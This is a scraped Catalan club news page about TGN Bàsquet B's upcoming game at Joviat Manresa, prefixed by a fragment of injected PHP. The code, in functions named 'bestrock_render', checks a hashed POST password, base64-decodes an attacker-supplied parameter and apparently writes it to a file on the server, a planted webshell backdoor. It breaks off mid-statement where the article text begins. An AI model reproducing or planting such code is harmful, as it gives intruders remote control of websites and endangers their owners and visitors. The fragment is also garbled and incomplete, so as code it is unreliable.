function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B busca el primer triomf a la pista del Joviat (dilluns, 19.45 h) - Tgn Bàsquet Club -

El TGN Bàsquet B busca el primer triomf a la pista del Joviat (dilluns, 19.45 h)

By
Updated: octubre 11, 2015

El TGN Bàsquet B visita demà la pista del Joviat Manresa (19.45 h) amb el punt de mira en millorar les seves prestacions i aconseguir el primer triomf de la temporada. El conjunt que entrena Sergi Farré ha perdut els dos primers partits que ha jugat – Manyanet (33-52) i Prat (65-44)- i voldrà refer-se tot i que el repte serà difícil.

El Joviat ha jugat només un partit fins ara – derrota contra l’Igualada 54-32, i el de la primera jornada, contra el Prat, està ajornat pel 30 d’octubre- i voldrà fer valer el factor pista per sumar el que seria el seu primer triomf. “No ens importa qui sigui el rival, ara el més important som nosaltres. Els entrenaments d’aquesta setmana han estat bons, l’equip està creixent i hi ha un grup de jugadores que ja han agafat la responsabilitat dins el grup”, diu Sergi Farré.

La progressió del TGN Bàsquet B està sent evident malgrat les dues derrotes. Al primer matx, l’equip va ser molt inferior al Manyanet però en el segon, contra el Prat, després d’un mal inici, la segona meitat va ser esperançadora. “Perdre sempre et genera dubtes. Ens faltava ritme en els dos primers partits però això ho estem solucionant amb els entrenaments”, diu el tècnic, que disposarà de totes les seves jugadores, Irene Villegas inclosa, que va rebre un cop al nas quan no portava ni un minut de joc en la primera jornada contra el Manyanet.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *